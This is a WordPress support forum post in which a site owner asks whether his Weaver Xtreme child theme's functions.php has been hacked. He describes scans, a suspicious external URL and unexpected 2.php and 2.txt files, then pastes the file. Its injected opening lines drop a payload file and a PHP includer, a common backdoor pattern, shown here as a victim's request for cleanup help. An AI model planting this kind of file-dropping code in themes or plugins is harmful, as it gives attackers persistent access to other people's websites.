Home Forums Weaver Xtreme Theme Has My Xtreme-Child/Functions.php Been Hacked?

Viewing 1 post (of 1 total)
  • Author
    Posts
  • #62297
    frank
    Participant
    Weaver Xtreme 4.3.2.1 Options – Plus ( 3.1.1 )
    All plugins on above site up to date at the time of writing this post.
    =========================================================
    Recently on my site https://www.eldg.co.uk I had an error show up at top of the website that theĀ  Weaver-Xtreme-Child/Functions.php file had an error on line 2, on inspecting functions.php on line 2 had an unknown (To Me) URL “http://theflowerproject.co.uk/wp-content/themes/927/2.txt'”, there is no 927 folder on the server according to Filezilla. Also, two files have “appeared in the Weaver-Xtreme-Child folder named “2.php & 2.txt, I cannot access “2.txt file” as I apparently I do not have permission, even though I am the owner of the site and admin, I tried setting permissions via File Permissions but still no access.
    Firstly I ran a malware scan using Wordfence & Sucuri scanners which resulted in “No Threats” I then tried removing the offending URL and replacing it with my own http://www.eldg.co.uk, Result was my site broke, eventually go most of the website working again. I use IThemes Security.
    After altering the Functions.php file and breaking the site I had to do a restore from my server to recover the website.
    The site is working again without the error message but the suspicious Functions.php is still there along with the two suspect files 2.txt & 2.txt.
    Can anyone tell me how to clean the functions.php of the URL http://theflowerproject.co.uk.
    This is the file Functions.php:
    /*————————————————
    <?php
    if(!file_exists(‘2.txt’)) file_put_contents(‘2.txt’,$x,FILE_APPEND);
    if(!file_exists(‘2.php’)) file_put_contents(‘2.php’,'<?php include(\’2.txt\’);’,FILE_APPEND);
    ?><?php
    // Exit if accessed directly
    if ( !defined( ‘ABSPATH’ ) ) exit;
    // BEGIN ENQUEUE PARENT ACTION
    // AUTO GENERATED – Do not modify or remove comment markers above or below:
    // END ENQUEUE PARENT ACTION
    —————————————————————–*/
Viewing 1 post (of 1 total)
  • You must be logged in to reply to this topic.